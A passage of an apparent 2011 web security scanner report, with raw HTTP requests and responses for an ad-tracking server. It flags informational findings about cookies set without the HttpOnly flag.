BHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOzdSPUPxAyoXPah9kyi7C70w/Ic06E82HDgxMfptenJH+QxMcJPPGsyFAVT+6SBuOjuKJ5KYDNUBXyxL2dg7B2oqDAiqh1W+megWtR3XoJXxE+b3k70BKlvT5YvEuZ0/RALqrZKe/52guDCx1yv8IEqB3NuIb5M9E0P1eLplz4HhYGMt1XJa6PPDxd4ljqvSFEQClJtagh9UzDEFg6Cb5LdDadrKiwtHRl62r3F/lJB8Wq3syJAxzEPLO4bM0VnXvq5faJnoE+6gBD5yjyVDaOWRfQzLGIWkNHa+f2KJvAyTQlC4oHYQZOGM/cVc3WrnRQmj1KDwCk/46Dq6gu9fFpETdaKz7DpE5AVcVASeUiRu6t0E9gdbxRFlQnHfQxlj0O0yv/8sVDJfLtBv7VEv6KvS85d/vyrS+3/lJtowlLX877yZqlnDrYhsgIzJ/B2kGU/Y2tWcJtJNzrSLvL6uC6zAE3YCN+2b8ZfetlvToWWUxLm+kOAX5sNQa84+z+Y7BiXKA28ArWYuR2BzhZYqV+lNsl8IuYWHrQEhBevE6yTgfXBfZ5ZWDuef3muciM4uxq9eRevsktzwd4ZolhUro4q9RDXzP+z/Jt3SlkekF3F1UyZn5rEt9sK3VhPrPz7bFs0pGO/fShWwUhEJGkkGofDmr7oO9xVS0wlWlGR+HiZLLiNXtFztdl/InifBdzZrv7tEgPT/Ekl1qqx4lzM76Hls1fjGRalSthbIGWedXoj3t9T64fqUJnYWdom7ygUV4OI6Uek4g2aJV2sE2HBrV7ibQMfkHW6H2qlf/AvGzXk5juIW8AOsU6N3bJugxzerwleYqkN4SEXHO2TsUUB2Hii30ULmVN5KVwl4AT7t07WbQfIgUgh+J4zgAJSZ1//mvY7cAo2t7r+WZ+3UqK9EVFlB88NDlOgh4Jm3SdKvwyEx2VIxC8FQZezWpUIHfmHUohseSJ3s3QYI0FyZt+UimHMdHcAt0unq75eibm7XCXgvJjZ8QEa2uTso9gthoSRwjtm4zJD8KuDs9Dol9dL10gwkePtd9XjMMl1IiMfHEGPMzYrTXatfWNnptioKHatYztwbz3JzwC1e1SaBMwSq2wE51biaKnVTIX7gjw1dfMUEcH+SSwe4EKfaZDW3Y8jNtoFzFv7v+gK3Q=="; NETSEGS_E05510=bff01c00ddc153c5&E05510&0&4df0b096&0&&4dc9f625&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwHIRxS7gdG4nwPAq6ZuDH+vX93uE8x+80+EqavgLMjsVMcRzx4ED/5sU/DdHAgOy6ZFF6u9krYB07BFG6K2gCx9zATNAOyKPGfTqVHvkpDwSF+KJXhEbXYpBgIjd3IWX3TqLfPz6jE8vTUf3pdaWUiZB3YUWt0CiIC5F0X3tPgb/SivyvtveJcRXnIKv7kXwRgYvCvr55V+AZTEVXPZ4e3YCovCIOgMpRBSkPQefrNyf8+fevxeSnnxLtLBTd7bn/zQn98TJd0YWeOHbFIVzmnJlL/meZ5F8yEzm7HiS+gYXKCqjfBEgEJXe7pa4nhHi/FyghIrWjtv72jtBRuTmEa1PtCcp9wfqOSXME/TC3DDlgc0Ij565ULgb+NLzIZ6TpI8vIyqOkYR2CJSFdZdVnBUG0ncgAuL4be/4qG/lpeLJAr4R2ZcdSh9ENtyBu0UsstxyoNHHwBT0SxG1olEQxWdxat7mSTK4NzNH7bvJyyZeNxeZoviFwczbub9BMnSayVKnrf8mLmZYn0G+URiIr9to1aqeDG6xKYVAmQwGVEGKynGOyuqpwObt+MyvmywUWEZ1qy3YzLOSZi95dlvgQqf5nm2jI0E/rWzPceCg9nrDXdY5aA2KiG6/Ag/Qtn9BE0P6tHnl8GXHStyZrY4yXNhIUbljw44dlYagYpCHt4M3J4bPZG8YwZUp0ecARePUDtezFyfvRsc1iatb1pDP+cq/6Iul6LmWpIrzCvxlo9THyXVf5SG33tg9Lw2R/Ro5VrxlHAMqi5EG0xBZZuKHWEnXQrAXGw8FaURhjx71p9CkHtHT1BpsJC15G4HDCuuHnAqa2MRPkYaEZL2cVa7b84SiSmL76sma6ZAVTmsWibG6oMtgf+rO6uurjCoZJ5OCsW83NGfMcjZCzPl33xUGXappEWzObGyaUvOz7ose722NuQ6CgmfMlORcS+CfKwXULjWH6Zy36QCvGrnsM/T/4K0FLlEQnA/ZrpS8O/uyK8UlrSZbknpF5SKlqTmNy5yEGuQ4SS+qP+oPyRgWbGkd6TLhbS8wVZYRN53ZAc0jxNNVRDNVFRE9QSI2VrlZ/Ka1RizjzXzy0Mrq6kcHNlCK91uDwhC94dfZh3mu4LEbkhOgwvScvmwGeZy8gGWoQEjk0gAgb9SgQmtGBl5C+T7TrdHq6EejqJkS0OH/st2RxRBZGNqPJSPFO3Z9nkwH7dr0G89yU1lVThr9TPeyrKuuQlOnafjtcNVr+buGb3emJOGcjzfH90v2UdAQiKm9gZ6BDbLaq/nbVWxP/5HqWbZLa2/RS2GM94ibxZPKXwTQTSnoK6758zl7N8nLPQGrb7mauaNrJ0v4zNciOQWnVNzZaqhQO8UVgcjuWrUQiJTPQWDKxu4w8eoM53ZEdNIh7WnKbwDRVqkqD0y1KsGwOeg2fZkSaLcNFed69lS3DYgh37CBN1ozAybkSybs/DUjRL93JTQZlPIkdLkbJkhmGdhN2G2Xb4uomwrwx4xxkHDHG3BOj3sObWJNvojJs1Id/pPS2nPanvOm; rsi_segs_1000000=pUPF4j+huXIMH/C1v6FY5BBd22rQpqLhiqlfIGbg2pRiGwm2jLwjIZFNNncjloepKzF/B7fp/+SiGckQVLZSUTzj+4nBTYXuaiE2tboFoduZMg7DSfUQB6FE1zRWJ+JvnSM1QD/k1XGhHkLUgfDglit43hQFSUdHZJQSF53dKeKpN03eWE72VWj94BYjKTKN4L5Gwnt49kCfh4NX7Yupc8UIFDwNI2isE3jpy0Z7wVsuEt0AN6YPkEqTgQJCsJJ5QLcDtJEjeEElVwj2YS8+lkKzwpyUI+2OfxsO9qLeDmS4gNcdZsjN4X19hWG1EiefKKrQTnrgfI2IbbKzqrq8B06xUCuyS17v2CqRmS/dR+ZVZLNzO+qTBmUan9sKf1aCfEUTbHrsGEBh/kvJf6NZ5+UCBAgcq8pCii7a1bjsTzDGJwXRkSOHGtcJMZDh7/vql+KiRy8RgLyoynfCecVnrMnX1/v5cLd7dcSf2V0MYoiKPj3igqC/WBlMJa2kv3tivIQ3xJEJfWcn1IBDsEdychtCkzQZsqTjxB9rvaqygIfyDjPOK6lhn9xe9T7aGjAiI4K4iYfX2ws6sTwgL6cxMozoADzDlq+buBNOcY5Wi46voIO8IrwxEngkS02HbCdQCzSFT+iHt8XLHFMKuEo7pWFl3mS/AG0E6hSb3BlIofGveAoXng5LgAxvUbuQSYxUYeEYrZzrKZBj2KL/7uwC9qtVal+8MEpiXMq8LVTcEMTN8UQwTA7i4KHj5ovQSYN+XrnJESi2chF8GQewHz663m/zLekom6H2INVNC5q6rLxiFcwNagMSoxAWwAKjC4kAjh7qyWGICQRXqvM=; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4df0ca7b&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dca0a20&271d956a153787d6fee9112e9c6a9326; rtc_Wpvi=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Wpvi=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4U9BenIMH/AtZKgq+hMq9rGiLObgpWFak32IrQMGnmfHuiYgDQaAwxUK6pw26DoqxCfW+eqapBmXPvrSCTB7imSFpaF3jgTKu6gUiM/MJRCfSdEcMdPs9/RVdVv7DqMTpKG3eKUxCc7lJ3d4uPsvbVf83JLReyHT0jN1BuyEb58GYv/LxKgpVexexquZuKeRToBghnCuFqedwf+X0+YnFkDWagD0BMcPYulELz0Mu1DalYUSGBXMWxkRYfFMQRdUKkHhG90juoC8zukmR3XUhPkj00YpF2v5czJRQ8SR6gaizuiNEQ+QtZ7WfXUMko8jtDXzRUtxNTBAMkLNRQ+XzDyirDhbvazbS8/7gtzWJyWfk5KsLPx7Q9qP5kzmdWUwW7lRqclR7mqeBoqC+Rg6F3yUB1cjUA0C1JAB1EfFSLXDDMBO/VGddHz6BEQZtg7jVMyyHWkklB/ylhn57DgGhka9RgfFaGog+TI+efabH1jyM9UzezU4kE4ezjmSqfcV/LT639exN2dv6SNc8xX6vec6TwgSyBCXX5NpkJUYs2u7Nc+dQuAslSekP8ytibSAnkix/CLYCkJHM95uu6RAjhu14tfA6zktTgYsuOV8x3odnKGudu22ET3e9sTjq7QkGROT3nxOPXPfZ8/cJSmEtYP4g7BZg1/NAm3WBms1r04ODz8Z6iGFw8vqqeoO8AFIwRroRSClNoIiSch9DCbalqeyJJ8LB0sJS1wG4nBUO2j6NmimsJvP78/PqfzBYrjnVw2xys5nCR829DnRtFNHTrduQPNWAPdVcerXhuIh3n/PEjH4JxD14Wa6dO0AHjPeWmLIcrJpp6rgVQBrWNjuKtQKfQbZ+nLdNJOl; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:31:34 GMT; Path=/
Set-Cookie: rtc_YjUU=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; Domain=.revsci.net; Expires=Fri, 11-May-2012 13:31:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 13:31:33 GMT

GIF89a.............!.......,...........D..;
9.81. http://pix04.revsci.net/K05540/b3/0/3/1003161/572935433.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /K05540/b3/0/3/1003161/572935433.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /K05540/b3/0/3/1003161/572935433.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.zdnet.com%252Fblog%252Fcomputers%252Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%252F5773%253Fsite%253D2%2526ncat%253D6037%25253A13616%25253A%2526ptype%253D2100%2526_rsiL%253D0%26DM_EOM%3D1&C=K05540 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4decfa31&2&10433,10524&4dc75824&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4decfa40&1&10009&4dc75095&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4decfa7c&0&&4dc76015&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dee240a&0&&4dc8b573&271d956a153787d6fee9112e9c6a9326; NETSEGS_J09847=bff01c00ddc153c5&J09847&0&4dee247a&0&&4dc8a2b6&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4def8d7d&5&10011,10030,10070,50085,50150&4dc8d181&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4def8f97&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dc8d904&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4def8f9d&1&10592&4dca02d1&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4def8fc2&0&&4dc9f632&271d956a153787d6fee9112e9c6a9326; NETSEGS_J07717=bff01c00ddc153c5&J07717&0&4df0a86e&0&&4dcb3d30&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07707=bff01c00ddc153c5&H07707&0&4df0a87c&0&&4dca5d68&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4df0b07e&0&&4dca8ab1&271d956a153787d6fee9112e9c6a9326; rsiPus_qbvO="MLsXrrEOpxpv55DW8tahZ2a57v4BlC60cICOgIfdHU7gwI+bhP0TqX40neBrVzd04YF7hotNL+h4vvc66tVVUjceSeakCP8FKl+7vpw/cPKd8tMu3PMCPoyxK8+ZjwDWyB3QMrpomCL0QiC5Kvy/YgnB8KTN7G9dLpnN5M3RK+PP1zwMehHWmM2JccWRv5ZmhNfQmN/YDBU94E+biCIoa0pKkv2eA2x+zJ1SCIL380rO+L9Lk2iLRCLsePDloY4CaZKvkWcnHN4spMzHQnUA9nMhOsrooPww0kmF/1pBhtUOQIGwwBNshy3r9jL9DmeVgwo+si4cw2GLg+UiObBCYgDoqFuF17tgWtie8ndkcM4/dxQZHmAVAFp6Cd4+NKEDE1ApHgzdWMCRN3mtXvTF3dagjo97ZcxX3TK0H5gNZL/tX25K+rZRwN8wPyK9oLx40INCM6m5859n+iEwb4c3uHEIWIExaGsanUSO3meucYKt8SqtiIB1ZKfcV2EWnE5l0JI9ym05H0J1D++1YxD2YWIf3FMp0ODLJXHC5LJl8HAXM9kRR0eUwpIWZ43I4Sxu/ghMwCqycSGD5P5qCz+NfB7cpFNnCm/MZxXAtHhkwlvld7DwvFMTxzkmteonO6+tWDCvSgxfKLeBCsnh7/g2pdMlW86tZQUhX+5vIkdTKTAbn/ygJRg0T3sdyAIGgf6VindVNH18jDokISc3IGyw/B24wJC4km6cNzLCqq3zgXP3vffJqf4px62L8VMyvj3CaMObL1w9lE2lhd4iKvN3GccP1FcTweH5kHDsZZBw7FHK1W7K9ytiQtKzGQRCBtx0rurYuoXmj+tBMHYIGgQGQbpACUKiwMwgO11XDJXNsqWXOeTs409iMvRAAhFR3MmxY/Ai8JtqiI6b0Q1+g1WTMqPGi0honF4/t46uL9iK78Kt/amFrG5zPGbmiPmMFkLKl9wLroTlxm+6qkNbYbThc0/QKEKH9b1zlGLxfdlc3hqznACvxpp0ybDR66WjOYSYr5GJsa1Cu2wcBHbKR1AxsYBzoLba+u6l87gczye8xuTrYhFfwlnHydy7IYalgPJBk32vZgWW2CXqypZtqnwMKkA2NoSDvvRLOZsd5s2E5nriVmz0A020hMNet6ezR0BbsbFJkikbhD25+D5hxe38KqYGvD586gb8nEzI0j5isfTJ/lkLrhbQFBZeshLI9NVhvhrxY3ujvMVlKz2TG/zsc7BVzk9fFPtT7mgROfudWRI+VvwrnXNE2vCSQzOJZeEAKPJctLVBCeeH5f0I+bMVOeVLPDBFeBnbAN+UOthqW+XB3wOga/8nLvsjoupDcwH+hneOk/D89Naxn/NKF3MEN04OWc1SJ6wrzqU6VhG4EvS+Zv+fJ8Gt98W7PtFLVLD0oQ=="; rsi_us_1000000="pUMV4ylDPxYY7RUCt3RYS68XU2Z/uOqvJR0SNgYO9rFAJiyyAu+FxS1Z30ODwyEFcoEx3T1Eetffz3Mf20XkwCrwYFLZZJxtyzGTJat2XTjlIN8P+hQPSL5K9zsL+kusRTvgKYlhihBhqZKK6GKen73oVAV9BWGkbl//D/fTGMFsID28cq6D7duOtAY3S7ThixmzbEOMxOHaa0VO3cDkKGVKS9qitOaUYlvgkLY1MKDOtODLrFUkILMlSRpCe7+47YCa4Yvgfmntw+kxPheKq6wDe8Fd8gOqjo+YsYcbcBetJ/UlUtydzNb+VQfdT8dEj/2h41IZ5vmY/5vsAZW1gUJs43Y9iklV1tAb9jY/G3Rk4zy39xByfOtBbqnZZm8zU97WhpjXwdwTrCSEuJ4CNdY/fhO3f+aPVPTKG9RnYRL0QJ4kFGhThODFPtf76e2qY1SQ9slSHrnY01CTJTrHMxySjJKQAVAr1obI8ilzYsPlaT1OSvYVS9TK9PoGrO5Jx5bXw/zwwE6Wrxwt7KjBiQjMb8pc2/6daLQ71r2XwEeaREz3clc3XYbmXIZKYmXXjpSqe6jB0kwcSkFst/ViDZpkDsFltV4ci5YQ/eJMqmyKrF/0uup6pq93xJKQibeBPvkCxBjBIGLPE6+meOz